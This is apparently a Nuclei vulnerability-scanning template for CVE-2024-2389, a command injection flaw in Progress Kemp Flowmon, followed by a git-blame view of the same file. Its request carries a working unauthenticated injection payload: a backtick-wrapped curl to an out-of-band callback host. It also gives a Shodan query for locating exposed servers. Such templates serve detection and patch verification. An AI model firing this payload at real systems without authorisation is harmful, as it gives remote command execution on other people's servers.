nuclei-templates/http/cves/2024/CVE-2024-2389.yaml

id: CVE-2024-2389

info:
  name: Progress Kemp Flowmon - Command Injection
  author: pdresearch,parthmalhotra
  severity: critical
  description: |
    In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.
  reference:
    - https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
    - https://www.flowmon.com
    - https://twitter.com/wvuuuuuuuuuuuuu/status/1777977522140950640
    - https://github.com/adhikara13/CVE-2024-2389
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-2389
    cwe-id: CWE-78
    epss-score: 0.00043
    epss-percentile: 0.08267
  metadata:
    verified: true
    max-request: 1
    shodan-query: 'Server: Flowmon'
  tags: cve,cve2024,progress,rce,flowmon

http:
  - method: GET
    path:
      - "{{BaseURL}}/service.pdfs/confluence?lang=en&file=`curl+{{interactsh-url}}`"

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'http')
          - contains(header, 'application/json') && contains(header, 'Flowmon')
        condition: and
# digest: 4a0a0047304502207fff2df97af5c386e321b4cf7cd8317add3157dc7d0ba1bcfcaf2a8a1afc1665022100f65e2e2ae77f22edcf20d9e072ab0b6a87b6a60d8d00c598d3e47ca906c1e60c:922c64590222798bb761d5b6d8e72950
Create CVE-2024-2389.yaml 2024-04-19 21:06:59 +00:00			`id: CVE-2024-2389`
fix-matcher 2024-04-20 01:52:38 +00:00
Create CVE-2024-2389.yaml 2024-04-19 21:06:59 +00:00			`info:`
fix-matcher 2024-04-20 01:52:38 +00:00			`name: Progress Kemp Flowmon - Command Injection`
			`author: pdresearch,parthmalhotra`
Create CVE-2024-2389.yaml 2024-04-19 21:06:59 +00:00			`severity: critical`
fix-matcher 2024-04-20 01:52:38 +00:00			`description: \|`
			`In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.`
Create CVE-2024-2389.yaml 2024-04-19 21:06:59 +00:00			`reference:`
			`- https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability`
			`- https://www.flowmon.com`
			`- https://twitter.com/wvuuuuuuuuuuuuu/status/1777977522140950640`
fix-matcher 2024-04-20 01:52:38 +00:00			`- https://github.com/adhikara13/CVE-2024-2389`
			`- https://github.com/nomi-sec/PoC-in-GitHub`
Create CVE-2024-2389.yaml 2024-04-19 21:06:59 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
			`cvss-score: 10`
			`cve-id: CVE-2024-2389`
			`cwe-id: CWE-78`
			`epss-score: 0.00043`
fix-matcher 2024-04-20 01:52:38 +00:00			`epss-percentile: 0.08267`
			`metadata:`
			`verified: true`
			`max-request: 1`
			`shodan-query: 'Server: Flowmon'`
			`tags: cve,cve2024,progress,rce,flowmon`
Create CVE-2024-2389.yaml 2024-04-19 21:06:59 +00:00
			`http:`
			`- method: GET`
			`path:`
			- "{{BaseURL}}/service.pdfs/confluence?lang=en&file=`curl+{{interactsh-url}}`"
fix-matcher 2024-04-20 01:52:38 +00:00
Create CVE-2024-2389.yaml 2024-04-19 21:06:59 +00:00			`matchers:`
fix-matcher 2024-04-20 01:52:38 +00:00			`- type: dsl`
			`dsl:`
			`- contains(interactsh_protocol, 'http')`
			`- contains(header, 'application/json') && contains(header, 'Flowmon')`
			`condition: and`
Auto Template Signing [Tue Apr 23 10:06:08 UTC 2024] :robot: 2024-04-23 10:06:08 +00:00			`# digest: 4a0a0047304502207fff2df97af5c386e321b4cf7cd8317add3157dc7d0ba1bcfcaf2a8a1afc1665022100f65e2e2ae77f22edcf20d9e072ab0b6a87b6a60d8d00c598d3e47ca906c1e60c:922c64590222798bb761d5b6d8e72950`